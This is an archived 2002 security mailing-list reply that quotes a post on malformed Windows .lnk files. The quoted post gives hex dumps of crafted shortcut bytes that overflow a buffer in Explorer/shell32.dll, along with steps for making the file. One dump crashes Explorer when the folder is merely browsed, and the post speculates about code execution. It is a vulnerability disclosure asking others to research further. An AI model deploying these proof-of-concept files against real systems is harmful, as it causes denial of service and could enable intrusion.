Re: Windows .lnk Files

From: cyberiadat_private
Date: Wed Jun 26 2002 - 11:43:18 PDT


    Hello,
    
    I've done some playing around with malformed .lnk files
    under Windows 2000 and found similar results; nothing
    published yet. I found it was similar to a problem USSR
    Labs reported some time ago with Windows NT but was in
    relation to SERVU FTP ... upload the malformed .lnk file
    execute a list and crash/overflow.
    
    Also discussed at,
    
    http://archives.neohapsis.com/archives/vuln-dev/2000-q1/0568.html
    
    Cyberiad
    
    On Wed, 26 Jun 2002, Brett Moore wrote:
    
    > It seems that the handling of .lnk files has a few problems. I have tested
    > on both win98 and win2000 sp2 server.
    >
    > Can anyone test further? Note that the actions taken by these .lnk files have
    > the possibility of causing damage to a system and should not be tested on an
    > essential server :-)
    >
    > -------------------------------------------------------------------
    > 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
    > 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
    > 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 FF FF  t NEWTEX~3.TXT
    > FF FF 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    > 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    > 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    > -------------------------------------------------------------------
    >
    > This causes FF FF to be loaded into a register used to control the length of
    > data copied. Usually causes an error when right clicking on the file in
    > explorer. Sometimes it is required to select properties. Errors seen include
    > unable to read, unable to write. Since we are controlling the length of the
    > data copied these errors are self explanatory.
    >
    > Would seem that explorer/shell32.dll is copying too much data when reading
    > the filename? Ok so this causes the read/write errors and halts progress.
    >
    > But if we substitute valid values such as 01 01 (CC CC) then the buffer
    > still gets overflowed but we bypass this error and our corrupt values get
    > further down in the program.
    >
    > -------------------------------------------------------------------
    > 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
    > 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
    > 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 CC CC  t NEWTEX~3.TXT¦¦
    > CC CC 0F 0F-0F 0F 0F 0F-FF F0 F0 F0-F0 F0 F0 F0  ¦¦¤¤¤¤¤¤________
    > AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
    > AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
    > -------------------------------------------------------------------
    >
    > This one does not cause the read/write errors but causes a DoS in explorer
    > just by browsing to the folder holding the file.
    >
    > This is more interesting, but involves tracking a lot of assembler code.
    > Worst result would be some sort of code executed just by browsing a folder.
    > Virus related perhaps.
    >
    > Any feedback on results or further research into this problem would be
    > appreciated.
    >
    > Notes:
    > 	Do not save to your desktop.
    > 	Rename the file to .lnk
    > 	This is the win98 file. You can easily modify a 2000 or other lnk file as
    > detailed above.
    >
    >
    > Brett Moore
    >
    >
    



    This archive was generated by hypermail 2b30 : Wed Jun 26 2002 - 21:16:50 PDT